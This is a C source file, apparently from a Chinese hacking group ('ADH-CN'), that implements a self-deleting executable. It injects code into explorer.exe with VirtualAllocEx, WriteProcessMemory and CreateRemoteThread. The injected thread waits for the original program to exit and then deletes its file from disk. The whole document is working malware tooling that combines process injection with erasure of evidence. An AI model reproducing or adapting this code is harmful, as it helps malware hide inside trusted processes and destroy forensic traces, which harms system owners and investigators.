//Auto Delete //coded by robinh00d #include #include #pragma comment(lib,"kernel32.lib") #pragma comment(lib,"user32.lib") typedef struct sARGVDATA { DWORD OpenProcessAddr ; DWORD WaitForSingleObjectAddr ; DWORD DeleteFileAddr ; char File[MAX_PATH] ; DWORD pid ; } ARGVDATA ; DWORD WINAPI func(ARGVDATA *pArgv) { typedef HANDLE (__stdcall *MyOpenProcess)(DWORD,BOOL,DWORD) ; typedef DWORD (__stdcall *MyWaitForSingleObject)(HANDLE,DWORD) ; typedef BOOL (__stdcall *MyDeleteFile)(LPCSTR) ; HANDLE hProc ; MyOpenProcess pOpenProcess ; MyWaitForSingleObject pWaitForSingleObject ; MyDeleteFile pDeleteFile ; pOpenProcess = (MyOpenProcess)pArgv->OpenProcessAddr ; pWaitForSingleObject = (MyWaitForSingleObject)pArgv->WaitForSingleObjectAddr ; pDeleteFile = (MyDeleteFile)pArgv->DeleteFileAddr ; hProc = pOpenProcess(PROCESS_ALL_ACCESS,FALSE,pArgv->pid) ; if (hProc!=NULL) { pWaitForSingleObject(hProc,INFINITE) ; pDeleteFile(pArgv->File) ; } else { //Delete File pDeleteFile(pArgv->File) ; } return 0 ; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { ARGVDATA argc_data ; ARGVDATA *p_data ; HANDLE hSnap ; HANDLE hExp ; HANDLE hKernel ; FARPROC p_remote_thread ; PROCESSENTRY32 ps ; BOOL bRet ; hKernel = LoadLibrary("kernel32.dll") ; //Fill up the parameter argc_data.OpenProcessAddr = (DWORD)GetProcAddress(hKernel,"OpenProcess") ; argc_data.WaitForSingleObjectAddr = (DWORD)GetProcAddress(hKernel,"WaitForSingleObject") ; argc_data.DeleteFileAddr = (DWORD)GetProcAddress(hKernel,"DeleteFileA") ; argc_data.pid = GetCurrentProcessId() ; GetModuleFileName(NULL,argc_data.File,MAX_PATH) ; // hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0) ; bRet = Process32First(hSnap,&ps) ; while (bRet) { if (!strcmp(ps.szExeFile,"EXPLORER.EXE")) { break ; } bRet = Process32Next(hSnap,&ps) ; } hExp = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ps.th32ProcessID) ; if (NULL==hExp) { MessageBox(0,"Fail to open Explorer","DEBUG",0) ; return -1 ; } p_data = (ARGVDATA *)VirtualAllocEx(hExp, NULL, sizeof(ARGVDATA), MEM_COMMIT, PAGE_READWRITE) ; if (NULL==p_data) { MessageBox(0,"Fail to assign memory!","DEBUG",0) ; CloseHandle(hExp) ; return -1 ; } if (FALSE==WriteProcessMemory(hExp,p_data,&argc_data,sizeof(ARGVDATA),NULL)) { MessageBox(0,"Fail to Fill up the parameter in memory!","DEBUG",0) ; CloseHandle(hExp) ; return -1 ; } p_remote_thread = (FARPROC)VirtualAllocEx(hExp,NULL,1024*2,MEM_COMMIT,PAGE_EXECUTE_READWRITE) ; if (NULL==p_remote_thread) { MessageBox(0,"Fail!","DEBUG",0) ; CloseHandle(hExp) ; return -1 ; } if (FALSE==WriteProcessMemory(hExp,p_remote_thread,(FARPROC)&func,1024*2,NULL)) { MessageBox(0,"Fail!","DEBUG",0) ; CloseHandle(hExp) ; return -1 ; } CreateRemoteThread(hExp,NULL,0,(LPTHREAD_START_ROUTINE)p_remote_thread,p_data,0,NULL) ; WaitForSingleObject(p_remote_thread,INFINITE) ; FreeLibrary(hKernel) ; CloseHandle(hExp) ; MessageBox(NULL,"Demo","ADH-CN",0) ; //Sleep(3000) ; ExitProcess(0) ; }